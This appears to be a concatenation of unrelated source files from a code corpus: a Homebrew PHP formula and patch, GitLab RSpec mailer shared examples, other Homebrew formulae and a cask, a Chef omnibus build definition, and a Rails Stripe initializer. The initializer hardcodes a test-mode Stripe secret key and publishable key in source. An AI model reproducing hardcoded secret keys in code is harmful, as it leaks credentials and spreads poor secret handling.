# of using Apache http in combination with php if the non-compatible MPM
# has been selected. Homebrew has chosen not to support being able to
# compile a thread safe version of PHP and therefore it is not
# possible to recompile as suggested in the original message
inreplace "sapi/apache2handler/sapi_apache2.c",
"You need to recompile PHP.",
"Homebrew PHP does not support a thread-safe php binary. "\
"To use the PHP apache sapi please change "\
"your httpd config to use the prefork MPM"
inreplace "sapi/fpm/php-fpm.conf.in", ";daemonize = yes", "daemonize = no"
# API compatibility with tidy-html5 v5.0.0 - https://github.com/htacg/tidy-html5/issues/224
inreplace "ext/tidy/tidy.c", "buffio.h", "tidybuffio.h"
# Required due to icu4c dependency
ENV.cxx11
# icu4c 61.1 compatability
ENV.append "CPPFLAGS", "-DU_USING_ICU_NAMESPACE=1"
config_path = etc/"php/#{php_version}"
# Prevent system pear config from inhibiting pear install
(config_path/"pear.conf").delete if (config_path/"pear.conf").exist?
# Prevent homebrew from harcoding path to sed shim in phpize script
ENV["lt_cv_path_SED"] = "sed"
# Each extension that is built on Mojave needs a direct reference to the
# sdk path or it won't find the headers
headers_path = "=#{MacOS.sdk_path_if_needed}/usr"
args = %W[
--prefix=#{prefix}
--localstatedir=#{var}
--sysconfdir=#{config_path}
--with-config-file-path=#{config_path}
--with-config-file-scan-dir=#{config_path}/conf.d
--with-pear=#{pkgshare}/pear
--enable-bcmath
--enable-calendar
--enable-dba
--enable-exif
--enable-ftp
--enable-fpm
--enable-intl
--enable-mbregex
--enable-mbstring
--enable-mysqlnd
--enable-pcntl
--enable-phpdbg
--enable-shmop
--enable-soap
--enable-sockets
--enable-sysvmsg
--enable-sysvsem
--enable-sysvshm
--enable-wddx
--enable-zip
--with-apxs2=#{Formula["httpd"].opt_bin}/apxs
--with-bz2#{headers_path}
--with-curl=#{Formula["curl-openssl"].opt_prefix}
--with-fpm-user=_www
--with-fpm-group=_www
--with-freetype-dir=#{Formula["freetype"].opt_prefix}
--with-gd
--with-gettext=#{Formula["gettext"].opt_prefix}
--with-gmp=#{Formula["gmp"].opt_prefix}
--with-iconv#{headers_path}
--with-icu-dir=#{Formula["icu4c"].opt_prefix}
--with-jpeg-dir=#{Formula["jpeg"].opt_prefix}
--with-kerberos#{headers_path}
--with-layout=GNU
--with-ldap=#{Formula["openldap"].opt_prefix}
--with-ldap-sasl#{headers_path}
--with-libedit#{headers_path}
--with-libxml-dir#{headers_path}
--with-libzip
--with-mcrypt=#{Formula["mcrypt"].opt_prefix}
--with-mhash#{headers_path}
--with-mysql-sock=/tmp/mysql.sock
--with-mysqli=mysqlnd
--with-mysql=mysqlnd
--with-ndbm#{headers_path}
--with-openssl=#{Formula["openssl"].opt_prefix}
--with-pdo-dblib=#{Formula["freetds"].opt_prefix}
--with-pdo-mysql=mysqlnd
--with-pdo-odbc=unixODBC,#{Formula["unixodbc"].opt_prefix}
--with-pdo-pgsql=#{Formula["libpq"].opt_prefix}
--with-pdo-sqlite=#{Formula["sqlite"].opt_prefix}
--with-pgsql=#{Formula["libpq"].opt_prefix}
--with-pic
--with-png-dir=#{Formula["libpng"].opt_prefix}
--with-pspell=#{Formula["aspell"].opt_prefix}
--with-sqlite3=#{Formula["sqlite"].opt_prefix}
--with-tidy=#{Formula["tidy-html5"].opt_prefix}
--with-unixODBC=#{Formula["unixodbc"].opt_prefix}
--with-xmlrpc
--with-xsl#{headers_path}
--with-zlib#{headers_path}
]
system "./configure", *args
system "make"
system "make", "install"
# Allow pecl to install outside of Cellar
extension_dir = Utils.popen_read("#{bin}/php-config --extension-dir").chomp
orig_ext_dir = File.basename(extension_dir)
inreplace bin/"php-config", lib/"php", prefix/"pecl"
inreplace "php.ini-development", %r{; ?extension_dir = "\./"},
"extension_dir = \"#{HOMEBREW_PREFIX}/lib/php/pecl/#{orig_ext_dir}\""
config_files = {
"php.ini-development" => "php.ini",
"sapi/fpm/php-fpm.conf" => "php-fpm.conf",
}
config_files.each_value do |dst|
dst_default = config_path/"#{dst}.default"
rm dst_default if dst_default.exist?
end
config_path.install config_files
unless (var/"log/php-fpm.log").exist?
(var/"log").mkpath
touch var/"log/php-fpm.log"
end
end
def post_install
pear_prefix = pkgshare/"pear"
pear_files = %W[
#{pear_prefix}/.depdblock
#{pear_prefix}/.filemap
#{pear_prefix}/.depdb
#{pear_prefix}/.lock
]
%W[
#{pear_prefix}/.channels
#{pear_prefix}/.channels/.alias
].each do |f|
chmod 0755, f
pear_files.concat(Dir["#{f}/*"])
end
chmod 0644, pear_files
# Custom location for extensions installed via pecl
pecl_path = HOMEBREW_PREFIX/"lib/php/pecl"
ln_s pecl_path, prefix/"pecl" unless (prefix/"pecl").exist?
extension_dir = Utils.popen_read("#{bin}/php-config --extension-dir").chomp
php_basename = File.basename(extension_dir)
php_ext_dir = opt_prefix/"lib/php"/php_basename
# fix pear config to install outside cellar
pear_path = HOMEBREW_PREFIX/"share/pear@#{php_version}"
cp_r pkgshare/"pear/.", pear_path
{
"php_ini" => etc/"php/#{php_version}/php.ini",
"php_dir" => pear_path,
"doc_dir" => pear_path/"doc",
"ext_dir" => pecl_path/php_basename,
"bin_dir" => opt_bin,
"data_dir" => pear_path/"data",
"cfg_dir" => pear_path/"cfg",
"www_dir" => pear_path/"htdocs",
"man_dir" => HOMEBREW_PREFIX/"share/man",
"test_dir" => pear_path/"test",
"php_bin" => opt_bin/"php",
}.each do |key, value|
value.mkpath if key =~ /(?<!bin|man)_dir$/
system bin/"pear", "config-set", key, value, "system"
end
system bin/"pear", "update-channels"
%w[
opcache
].each do |e|
ext_config_path = etc/"php/#{php_version}/conf.d/ext-#{e}.ini"
extension_type = (e == "opcache") ? "zend_extension" : "extension"
if ext_config_path.exist?
inreplace ext_config_path,
/#{extension_type}=.*$/, "#{extension_type}=#{php_ext_dir}/#{e}.so"
else
ext_config_path.write <<~EOS
[#{e}]
#{extension_type}="#{php_ext_dir}/#{e}.so"
EOS
end
end
end
def caveats
<<~EOS
To enable PHP in Apache add the following to httpd.conf and restart Apache:
LoadModule php5_module #{opt_lib}/httpd/modules/libphp5.so
<FilesMatch \\.php$>
SetHandler application/x-httpd-php
</FilesMatch>
Finally, check DirectoryIndex includes index.php
DirectoryIndex index.php index.html
The php.ini and php-fpm.ini file can be found in:
#{etc}/php/#{php_version}/
EOS
end
def php_version
version.to_s.split(".")[0..1].join(".")
end
plist_options :manual => "php-fpm"
def plist; <<~EOS
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>KeepAlive</key>
<true/>
<key>Label</key>
<string>#{plist_name}</string>
<key>ProgramArguments</key>
<array>
<string>#{opt_sbin}/php-fpm</string>
<string>--nodaemonize</string>
</array>
<key>RunAtLoad</key>
<true/>
<key>WorkingDirectory</key>
<string>#{var}</string>
<key>StandardErrorPath</key>
<string>#{var}/log/php-fpm.log</string>
</dict>
</plist>
EOS
end
test do
assert_match /^Zend OPcache$/, shell_output("#{bin}/php -i"),
"Zend OPCache extension not loaded"
# Test related to libxml2 and
# https://github.com/Homebrew/homebrew-core/issues/28398
assert_includes MachO::Tools.dylibs("#{bin}/php"),
"#{Formula["libpq"].opt_lib}/libpq.5.dylib"
system "#{sbin}/php-fpm", "-t"
system "#{bin}/phpdbg", "-V"
system "#{bin}/php-cgi", "-m"
# Prevent SNMP extension to be added
assert_no_match /^snmp$/, shell_output("#{bin}/php -m"),
"SNMP extension doesn't work reliably with Homebrew on High Sierra"
begin
require "socket"
server = TCPServer.new(0)
port = server.addr[1]
server_fpm = TCPServer.new(0)
port_fpm = server_fpm.addr[1]
server.close
server_fpm.close
expected_output = /^Hello world!$/
(testpath/"index.php").write <<~EOS
<?php
echo 'Hello world!' . PHP_EOL;
var_dump(ldap_connect());
EOS
main_config = <<~EOS
Listen #{port}
ServerName localhost:#{port}
DocumentRoot "#{testpath}"
ErrorLog "#{testpath}/httpd-error.log"
ServerRoot "#{Formula["httpd"].opt_prefix}"
PidFile "#{testpath}/httpd.pid"
LoadModule authz_core_module lib/httpd/modules/mod_authz_core.so
LoadModule unixd_module lib/httpd/modules/mod_unixd.so
LoadModule dir_module lib/httpd/modules/mod_dir.so
DirectoryIndex index.php
EOS
(testpath/"httpd.conf").write <<~EOS
#{main_config}
LoadModule mpm_prefork_module lib/httpd/modules/mod_mpm_prefork.so
LoadModule php5_module #{lib}/httpd/modules/libphp5.so
<FilesMatch \\.(php|phar)$>
SetHandler application/x-httpd-php
</FilesMatch>
EOS
(testpath/"fpm.conf").write <<~EOS
[global]
daemonize=no
[www]
listen = 127.0.0.1:#{port_fpm}
pm = dynamic
pm.max_children = 5
pm.start_servers = 2
pm.min_spare_servers = 1
pm.max_spare_servers = 3
EOS
(testpath/"httpd-fpm.conf").write <<~EOS
#{main_config}
LoadModule mpm_event_module lib/httpd/modules/mod_mpm_event.so
LoadModule proxy_module lib/httpd/modules/mod_proxy.so
LoadModule proxy_fcgi_module lib/httpd/modules/mod_proxy_fcgi.so
<FilesMatch \\.(php|phar)$>
SetHandler "proxy:fcgi://127.0.0.1:#{port_fpm}"
</FilesMatch>
EOS
pid = fork do
exec Formula["httpd"].opt_bin/"httpd", "-X", "-f", "#{testpath}/httpd.conf"
end
sleep 3
assert_match expected_output, shell_output("curl -s 127.0.0.1:#{port}")
Process.kill("TERM", pid)
Process.wait(pid)
fpm_pid = fork do
exec sbin/"php-fpm", "-y", "fpm.conf"
end
pid = fork do
exec Formula["httpd"].opt_bin/"httpd", "-X", "-f", "#{testpath}/httpd-fpm.conf"
end
sleep 3
assert_match expected_output, shell_output("curl -s 127.0.0.1:#{port}")
ensure
if pid
Process.kill("TERM", pid)
Process.wait(pid)
end
if fpm_pid
Process.kill("TERM", fpm_pid)
Process.wait(fpm_pid)
end
end
end
end
__END__
diff --git a/acinclude.m4 b/acinclude.m4
index 168c465f8d..6c087d152f 100644
--- a/acinclude.m4
+++ b/acinclude.m4
@@ -441,7 +441,11 @@ dnl
dnl Adds a path to linkpath/runpath (LDFLAGS)
dnl
AC_DEFUN([PHP_ADD_LIBPATH],[
- if test "$1" != "/usr/$PHP_LIBDIR" && test "$1" != "/usr/lib"; then
+ case "$1" in
+ "/usr/$PHP_LIBDIR"|"/usr/lib"[)] ;;
+ /Library/Developer/CommandLineTools/SDKs/*/usr/lib[)] ;;
+ /Applications/Xcode*.app/Contents/Developer/Platforms/MacOSX.platform/Developer/SDKs/*/usr/lib[)] ;;
+ *[)]
PHP_EXPAND_PATH($1, ai_p)
ifelse([$2],,[
_PHP_ADD_LIBPATH_GLOBAL([$ai_p])
@@ -452,8 +456,8 @@ AC_DEFUN([PHP_ADD_LIBPATH],[
else
_PHP_ADD_LIBPATH_GLOBAL([$ai_p])
fi
- ])
- fi
+ ]) ;;
+ esac
])
dnl
@@ -487,7 +491,11 @@ dnl add an include path.
dnl if before is 1, add in the beginning of INCLUDES.
dnl
AC_DEFUN([PHP_ADD_INCLUDE],[
- if test "$1" != "/usr/include"; then
+ case "$1" in
+ "/usr/include"[)] ;;
+ /Library/Developer/CommandLineTools/SDKs/*/usr/include[)] ;;
+ /Applications/Xcode*.app/Contents/Developer/Platforms/MacOSX.platform/Developer/SDKs/*/usr/include[)] ;;
+ *[)]
PHP_EXPAND_PATH($1, ai_p)
PHP_RUN_ONCE(INCLUDEPATH, $ai_p, [
if test "$2"; then
@@ -495,8 +503,8 @@ AC_DEFUN([PHP_ADD_INCLUDE],[
else
INCLUDES="$INCLUDES -I$ai_p"
fi
- ])
- fi
+ ]) ;;
+ esac
])
dnl internal, don't use
@@ -2411,7 +2419,8 @@ AC_DEFUN([PHP_SETUP_ICONV], [
fi
if test -f $ICONV_DIR/$PHP_LIBDIR/lib$iconv_lib_name.a ||
- test -f $ICONV_DIR/$PHP_LIBDIR/lib$iconv_lib_name.$SHLIB_SUFFIX_NAME
+ test -f $ICONV_DIR/$PHP_LIBDIR/lib$iconv_lib_name.$SHLIB_SUFFIX_NAME ||
+ test -f $ICONV_DIR/$PHP_LIBDIR/lib$iconv_lib_name.tbd
then
PHP_CHECK_LIBRARY($iconv_lib_name, libiconv, [
found_iconv=yes
diff --git a/Zend/zend_compile.h b/Zend/zend_compile.h
index a0955e34fe..09b4984f90 100644
--- a/Zend/zend_compile.h
+++ b/Zend/zend_compile.h
@@ -414,9 +414,6 @@ struct _zend_execute_data {
#define EX(element) execute_data.element
-#define EX_TMP_VAR(ex, n) ((temp_variable*)(((char*)(ex)) + ((int)(n))))
-#define EX_TMP_VAR_NUM(ex, n) (EX_TMP_VAR(ex, 0) - (1 + (n)))
-
#define EX_CV_NUM(ex, n) (((zval***)(((char*)(ex))+ZEND_MM_ALIGNED_SIZE(sizeof(zend_execute_data))))+(n))
diff --git a/Zend/zend_execute.h b/Zend/zend_execute.h
index a7af67bc13..ae71a5c73f 100644
--- a/Zend/zend_execute.h
+++ b/Zend/zend_execute.h
@@ -71,6 +71,15 @@ ZEND_API int zend_eval_stringl_ex(char *str, int str_len, zval *retval_ptr, char
ZEND_API char * zend_verify_arg_class_kind(const zend_arg_info *cur_arg_info, ulong fetch_type, const char **class_name, zend_class_entry **pce TSRMLS_DC);
ZEND_API int zend_verify_arg_error(int error_type, const zend_function *zf, zend_uint arg_num, const char *need_msg, const char *need_kind, const char *given_msg, const char *given_kind TSRMLS_DC);
+static zend_always_inline temp_variable *EX_TMP_VAR(void *ex, int n)
+{
+ return (temp_variable *)((zend_uintptr_t)ex + n);
+}
+static inline temp_variable *EX_TMP_VAR_NUM(void *ex, int n)
+{
+ return (temp_variable *)((zend_uintptr_t)ex - (1 + n) * sizeof(temp_variable));
+}
+
static zend_always_inline void i_zval_ptr_dtor(zval *zval_ptr ZEND_FILE_LINE_DC TSRMLS_DC)
{
if (!Z_DELREF_P(zval_ptr)) {
| 32.815175 | 198 | 0.63479 |
0143bf693c7d327aed98b375754b9e584cdf12ea | 10,583 | # frozen_string_literal: true
RSpec.shared_examples 'a multiple recipients email' do
it 'is sent to the given recipient' do
is_expected.to deliver_to recipient.notification_email
end
end
RSpec.shared_examples 'an email sent from GitLab' do
it 'has the characteristics of an email sent from GitLab' do
sender = subject.header[:from].addrs[0]
reply_to = subject.header[:reply_to].addresses
aggregate_failures do
expect(sender.display_name).to eq(gitlab_sender_display_name)
expect(sender.address).to eq(gitlab_sender)
expect(reply_to).to eq([gitlab_sender_reply_to])
end
end
end
RSpec.shared_examples 'an email sent to a user' do
it 'is sent to user\'s global notification email address' do
expect(subject).to deliver_to(recipient.notification_email)
end
context 'with group notification email' do
it 'is sent to user\'s group notification email' do
group_notification_email = '[email protected]'
create(:email, :confirmed, user: recipient, email: group_notification_email)
create(:notification_setting, user: recipient, source: group, notification_email: group_notification_email)
expect(subject).to deliver_to(group_notification_email)
end
end
end
RSpec.shared_examples 'an email that contains a header with author username' do
it 'has X-GitLab-Author header containing author\'s username' do
is_expected.to have_header 'X-GitLab-Author', user.username
end
end
RSpec.shared_examples 'an email with X-GitLab headers containing IDs' do
it 'has X-GitLab-*-ID header' do
is_expected.to have_header "X-GitLab-#{model.class.name}-ID", "#{model.id}"
end
it 'has X-GitLab-*-IID header if model has iid defined' do
if model.respond_to?(:iid)
is_expected.to have_header "X-GitLab-#{model.class.name}-IID", "#{model.iid}"
else
expect(subject.header["X-GitLab-#{model.class.name}-IID"]).to eq nil
end
end
end
RSpec.shared_examples 'an email with X-GitLab headers containing project details' do
it 'has X-GitLab-Project headers' do
aggregate_failures do
full_path_as_domain = "#{project.name}.#{project.namespace.path}"
is_expected.to have_header('X-GitLab-Project', /#{project.name}/)
is_expected.to have_header('X-GitLab-Project-Id', /#{project.id}/)
is_expected.to have_header('X-GitLab-Project-Path', /#{project.full_path}/)
is_expected.to have_header('List-Id', "#{project.full_path} <#{project.id}.#{full_path_as_domain}.#{Gitlab.config.gitlab.host}>")
end
end
end
RSpec.shared_examples 'a new thread email with reply-by-email enabled' do
it 'has the characteristics of a threaded email' do
host = Gitlab.config.gitlab.host
route_key = "#{model.class.model_name.singular_route_key}_#{model.id}"
aggregate_failures do
is_expected.to have_header('Message-ID', "<#{route_key}@#{host}>")
is_expected.to have_header('References', /\A<reply\-.*@#{host}>\Z/ )
end
end
end
RSpec.shared_examples 'a thread answer email with reply-by-email enabled' do
include_examples 'an email with X-GitLab headers containing project details'
include_examples 'an email with X-GitLab headers containing IDs'
it 'has the characteristics of a threaded reply' do
host = Gitlab.config.gitlab.host
route_key = "#{model.class.model_name.singular_route_key}_#{model.id}"
aggregate_failures do
is_expected.to have_header('Message-ID', /\A<.*@#{host}>\Z/)
is_expected.to have_header('In-Reply-To', "<#{route_key}@#{host}>")
is_expected.to have_header('References', /\A<reply\-.*@#{host}> <#{route_key}@#{host}>\Z/ )
is_expected.to have_subject(/^Re: /)
end
end
end
RSpec.shared_examples 'an email starting a new thread with reply-by-email enabled' do
include_examples 'an email with X-GitLab headers containing project details'
include_examples 'an email with X-GitLab headers containing IDs'
include_examples 'a new thread email with reply-by-email enabled'
it 'includes "Reply to this email directly or <View it on GitLab>"' do
expect(subject.default_part.body).to include(%(Reply to this email directly or <a href="#{Gitlab::UrlBuilder.build(model)}">view it on GitLab</a>.))
end
context 'when reply-by-email is enabled with incoming address with %{key}' do
it 'has a Reply-To header' do
is_expected.to have_header 'Reply-To', /<reply+(.*)@#{Gitlab.config.gitlab.host}>\Z/
end
end
context 'when reply-by-email is enabled with incoming address without %{key}' do
include_context 'reply-by-email is enabled with incoming address without %{key}'
include_examples 'a new thread email with reply-by-email enabled'
it 'has a Reply-To header' do
is_expected.to have_header 'Reply-To', /<reply@#{Gitlab.config.gitlab.host}>\Z/
end
end
end
RSpec.shared_examples 'an answer to an existing thread with reply-by-email enabled' do
include_examples 'an email with X-GitLab headers containing project details'
include_examples 'an email with X-GitLab headers containing IDs'
include_examples 'a thread answer email with reply-by-email enabled'
context 'when reply-by-email is enabled with incoming address with %{key}' do
it 'has a Reply-To header' do
is_expected.to have_header 'Reply-To', /<reply+(.*)@#{Gitlab.config.gitlab.host}>\Z/
end
end
context 'when reply-by-email is enabled with incoming address without %{key}' do
include_context 'reply-by-email is enabled with incoming address without %{key}'
include_examples 'a thread answer email with reply-by-email enabled'
it 'has a Reply-To header' do
is_expected.to have_header 'Reply-To', /<reply@#{Gitlab.config.gitlab.host}>\Z/
end
end
end
RSpec.shared_examples 'it should have Gmail Actions links' do
it do
aggregate_failures do
is_expected.to have_body_text('<script type="application/ld+json">')
is_expected.to have_body_text('ViewAction')
end
end
end
RSpec.shared_examples 'it should not have Gmail Actions links' do
it do
aggregate_failures do
is_expected.not_to have_body_text('<script type="application/ld+json">')
is_expected.not_to have_body_text('ViewAction')
end
end
end
RSpec.shared_examples 'it should show Gmail Actions View Issue link' do
it_behaves_like 'it should have Gmail Actions links'
it { is_expected.to have_body_text('View Issue') }
end
RSpec.shared_examples 'it should show Gmail Actions View Merge request link' do
it_behaves_like 'it should have Gmail Actions links'
it { is_expected.to have_body_text('View Merge request') }
end
RSpec.shared_examples 'it should show Gmail Actions View Commit link' do
it_behaves_like 'it should have Gmail Actions links'
it { is_expected.to have_body_text('View Commit') }
end
RSpec.shared_examples 'an unsubscribeable thread' do
it_behaves_like 'an unsubscribeable thread with incoming address without %{key}'
it 'has a List-Unsubscribe header in the correct format, and a body link' do
aggregate_failures do
is_expected.to have_header('List-Unsubscribe', /unsubscribe/)
is_expected.to have_header('List-Unsubscribe', /mailto/)
is_expected.to have_header('List-Unsubscribe', /^<.+,.+>$/)
is_expected.to have_body_text('unsubscribe')
end
end
end
RSpec.shared_examples 'an unsubscribeable thread with incoming address without %{key}' do
include_context 'reply-by-email is enabled with incoming address without %{key}'
it 'has a List-Unsubscribe header in the correct format, and a body link' do
aggregate_failures do
is_expected.to have_header('List-Unsubscribe', /unsubscribe/)
is_expected.not_to have_header('List-Unsubscribe', /mailto/)
is_expected.to have_header('List-Unsubscribe', /^<[^,]+>$/)
is_expected.to have_body_text('unsubscribe')
end
end
end
RSpec.shared_examples 'a user cannot unsubscribe through footer link' do
it 'does not have a List-Unsubscribe header or a body link' do
aggregate_failures do
is_expected.not_to have_header('List-Unsubscribe', /unsubscribe/)
is_expected.not_to have_body_text('unsubscribe')
end
end
end
RSpec.shared_examples 'an email with a labels subscriptions link in its footer' do
it { is_expected.to have_body_text('label subscriptions') }
end
RSpec.shared_examples 'a note email' do
it_behaves_like 'it should have Gmail Actions links'
it 'is sent to the given recipient as the author' do
sender = subject.header[:from].addrs[0]
aggregate_failures do
expect(sender.display_name).to eq(note_author.name)
expect(sender.address).to eq(gitlab_sender)
expect(subject).to deliver_to(recipient.notification_email)
end
end
it 'contains the message from the note' do
is_expected.to have_body_text note.note
end
it 'contains a link to note author' do
is_expected.to have_body_text note.author_name
end
end
RSpec.shared_examples 'appearance header and footer enabled' do
it "contains header and footer" do
create :appearance, header_message: "Foo", footer_message: "Bar", email_header_and_footer_enabled: true
aggregate_failures do
expect(subject.html_part).to have_body_text("<div class=\"header-message\" style=\"\"><p>Foo</p></div>")
expect(subject.html_part).to have_body_text("<div class=\"footer-message\" style=\"\"><p>Bar</p></div>")
expect(subject.text_part).to have_body_text(/^Foo/)
expect(subject.text_part).to have_body_text(/Bar$/)
end
end
end
RSpec.shared_examples 'appearance header and footer not enabled' do
it "does not contain header and footer" do
create :appearance, header_message: "Foo", footer_message: "Bar", email_header_and_footer_enabled: false
aggregate_failures do
expect(subject.html_part).not_to have_body_text("<div class=\"header-message\" style=\"\"><p>Foo</p></div>")
expect(subject.html_part).not_to have_body_text("<div class=\"footer-message\" style=\"\"><p>Bar</p></div>")
expect(subject.text_part).not_to have_body_text(/^Foo/)
expect(subject.text_part).not_to have_body_text(/Bar$/)
end
end
end
RSpec.shared_examples 'no email is sent' do
it 'does not send an email' do
expect(subject.message).to be_a_kind_of(ActionMailer::Base::NullMail)
end
end
RSpec.shared_examples 'does not render a manage notifications link' do
it do
aggregate_failures do
expect(subject).not_to have_body_text("Manage all notifications")
expect(subject).not_to have_body_text(profile_notifications_url)
end
end
end
| 37.133333 | 152 | 0.73174 |
4a507e61a21420b816316575f364c04151218c3a | 1,727 | class GitTown < Formula
desc "High-level command-line interface for Git"
homepage "https://www.git-town.com/"
url "https://github.com/git-town/git-town/archive/v7.4.0.tar.gz"
sha256 "f9ff00839fde70bc9b5024bae9a51d8b00e0bb309c3542ed65be50bb8a13e6a5"
license "MIT"
bottle do
rebuild 1
sha256 cellar: :any_skip_relocation, arm64_big_sur: "81f31ec12cd8abae36633570d7bfb4649e880c13b9312f30009272f6d8b7afe1"
sha256 cellar: :any_skip_relocation, big_sur: "95e2d5299980978b1901814ada3baa3b42a5c38474e042f891ba0aff10bbbeff"
sha256 cellar: :any_skip_relocation, catalina: "9c90e21d837c016a37117bbf04a6cb66e5acda6ea129dd7013a133cbf3e23d72"
sha256 cellar: :any_skip_relocation, mojave: "f54ad1a3ad30a40be97995c2a8abbecc447e4d93966f18fbb43fcfaf65448bfc"
sha256 cellar: :any_skip_relocation, high_sierra: "2ff4e78e7a3472caa0f5961996efd2ef9e4cfc82455363dfb4f9eaebd441cbe7"
sha256 cellar: :any_skip_relocation, x86_64_linux: "98d370ea32f6a733504ccc35f214df73deda583fa45ef58611d990632fd8e0ad"
end
depends_on "go" => :build
def install
system "go", "build", *std_go_args, "-ldflags",
"-X github.com/git-town/git-town/src/cmd.version=v#{version} "\
"-X github.com/git-town/git-town/src/cmd.buildDate=#{Time.new.strftime("%Y/%m/%d")}"
end
test do
assert_match version.to_s, shell_output("#{bin}/git-town version")
system "git", "init"
unless OS.mac?
system "git", "config", "user.email", "[email protected]"
system "git", "config", "user.name", "Your Name"
end
touch "testing.txt"
system "git", "add", "testing.txt"
system "git", "commit", "-m", "Testing!"
system "#{bin}/git-town", "config"
end
end
| 42.121951 | 122 | 0.730168 |
accf8308f27d70c515eb6de22c9785d3d84a40fb | 206 | Rails.configuration.stripe = {
:publishable_key => 'pk_test_HFtPBBUHWHIoJAqmb2YVhhbX',
:secret_key => 'sk_test_5fwH9FxRW7oP3u4eHYLfnPJH'
}
Stripe.api_key = Rails.configuration.stripe[:secret_key]
| 29.428571 | 57 | 0.776699 |
5d353ab4938df63c934392548fae583748b5f6f0 | 40 | module PistePal
VERSION = "1.2.0"
end
| 10 | 19 | 0.675 |
1828c5925ed3addad99508b7f8b0011e674ef241 | 344 | module FbGraph
module Connections
module Noreply
def noreply(options = {})
members = self.connection(:noreply, options)
members.map! do |member|
User.new(member[:id], member.merge(
:access_token => options[:access_token] || self.access_token
))
end
end
end
end
end | 24.571429 | 72 | 0.584302 |
5d4cc6caa1ea4a23cb38cbaf3f00a0048763da2f | 1,284 | cask 'airfoil' do
version '5.8.6'
sha256 '57cd3c272332c9f2398fb2fc6517dfdb757c9b52fbb30e5e317f0bd45f837846'
url 'https://rogueamoeba.com/airfoil/download/Airfoil.zip'
appcast 'https://rogueamoeba.net/ping/versionCheck.cgi?format=sparkle&bundleid=com.rogueamoeba.Airfoil&platform=osx'
name 'Airfoil'
homepage 'https://www.rogueamoeba.com/airfoil/mac/'
auto_updates true
app 'Airfoil/Airfoil Satellite.app'
app 'Airfoil/Airfoil.app'
uninstall delete: '/Library/Audio/Plug-Ins/HAL/InstantOn.driver',
quit: [
'com.rogueamoeba.Airfoil',
'com.rogueamoeba.AirfoilSpeakers',
]
zap trash: [
'~/Library/Application Support/Airfoil',
'~/Library/Application Support/Airfoil Satellite',
'~/Library/Caches/com.rogueamoeba.Airfoil',
'~/Library/Caches/com.rogueamoeba.AirfoilSpeakers',
'~/Library/Preferences/com.rogueamoeba.Airfoil.plist',
'~/Library/Preferences/com.rogueamoeba.AirfoilSpeakers.plist',
'~/Library/Saved Application State/com.rogueamoeba.Airfoil.savedState',
'~/Library/Saved Application State/com.rogueamoeba.AirfoilSpeakers.savedState',
]
end
| 40.125 | 118 | 0.655763 |
6130b3d74ce58d99980a212aa285d08825f0c4c8 | 2,934 | name "chef"
default_version "local_source"
license :project_license
# For the specific super-special version "local_source", build the source from
# the local git checkout. This is what you'd want to occur by default if you
# just ran omnibus build locally.
version("local_source") do
source path: File.expand_path("../..", project.files_path),
# Since we are using the local repo, we try to not copy any files
# that are generated in the process of bundle installing omnibus.
# If the install steps are well-behaved, this should not matter
# since we only perform bundle and gem installs from the
# omnibus cache source directory, but we do this regardless
# to maintain consistency between what a local build sees and
# what a github based build will see.
options: { exclude: [ "omnibus/vendor" ] }
end
# For any version other than "local_source", fetch from github.
if version != "local_source"
source git: "git://github.com/chef/chef.git"
end
# For nokogiri
dependency "libxml2"
dependency "libxslt"
dependency "liblzma"
dependency "zlib"
# ruby and bundler and friends
dependency "ruby"
dependency "rubygems"
dependency "bundler"
# Install all the native gems separately
# Worst offenders first to take best advantage of cache:
dependency "chef-gem-ffi-yajl"
dependency "chef-gem-ohai"
dependency "chef-gem-nokogiri" unless windows?
dependency "chef-gem-libyajl2"
dependency "chef-gem-ruby-prof"
dependency "chef-gem-byebug"
dependency "chef-gem-debug_inspector"
dependency "chef-gem-binding_of_caller"
unless ios_xr? || solaris?
dependency "chef-gem-rbnacl-libsodium"
dependency "chef-gem-bcrypt_pbkdf-ruby"
end
# Now everyone else, in alphabetical order because we don't care THAT much
Dir.entries(File.dirname(__FILE__)).sort.each do |gem_software|
if gem_software =~ /^(chef-gem-.+)\.rb$/
dependency $1
end
end
build do
# This is where we get the definitions below
require_relative "../../files/chef/build-chef"
extend BuildChef
project_env = env.dup
project_env["BUNDLE_GEMFILE"] = project_gemfile
# Prepare to install: build config, retries, job, frozen=true
# TODO Windows install seems to sometimes install already-installed gems such
# as gherkin (and fail as a result) if you use jobs > 1.
create_bundle_config(project_gemfile, retries: 4, jobs: windows? ? 1 : 7, frozen: true)
# Install all the things. Arguments are specified in .bundle/config (see create_bundle_config)
block { log.info(log_key) { "" } }
bundle "install --verbose", env: project_env
# Check that it worked
block { log.info(log_key) { "" } }
bundle "check", env: project_env
# fix up git-sourced gems
properly_reinstall_git_and_path_sourced_gems
install_shared_gemfile
# Check that the final gemfile worked
block { log.info(log_key) { "" } }
bundle "check", env: env, cwd: File.dirname(shared_gemfile)
end
| 33.340909 | 96 | 0.732106 |
79363ab406d056bba3ed2048f48592e28a88bd42 | 1,167 | class Quex < Formula
desc "Generate lexical analyzers"
homepage "http://quex.org/"
url "https://downloads.sourceforge.net/project/quex/DOWNLOAD/quex-0.68.2.tar.gz"
sha256 "b6a9325f92110c52126fec18432d0d6c9bd8a7593bde950db303881aac16a506"
head "https://svn.code.sf.net/p/quex/code/trunk"
bottle do
cellar :any_skip_relocation
sha256 "e5d0e22c8d988408e52ddabcd0b1ddd7e858c6256b1449b919a83f8da5934354" => :high_sierra
sha256 "e5d0e22c8d988408e52ddabcd0b1ddd7e858c6256b1449b919a83f8da5934354" => :sierra
sha256 "e5d0e22c8d988408e52ddabcd0b1ddd7e858c6256b1449b919a83f8da5934354" => :el_capitan
end
def install
libexec.install "quex", "quex-exe.py"
doc.install "README", "demo"
# Use a shim script to set QUEX_PATH on the user's behalf
(bin/"quex").write <<~EOS
#!/bin/bash
QUEX_PATH="#{libexec}" "#{libexec}/quex-exe.py" "$@"
EOS
if build.head?
man1.install "doc/manpage/quex.1"
else
man1.install "manpage/quex.1"
end
end
test do
system bin/"quex", "-i", doc/"demo/C/01-Trivial/simple.qx", "-o", "tiny_lexer"
assert_predicate testpath/"tiny_lexer", :exist?
end
end
| 31.540541 | 93 | 0.713796 |
f7178e3ca8875c9403352d856542c1d65e992991 | 60 | class Meal < ApplicationRecord
belongs_to :category
end
| 15 | 30 | 0.783333 |
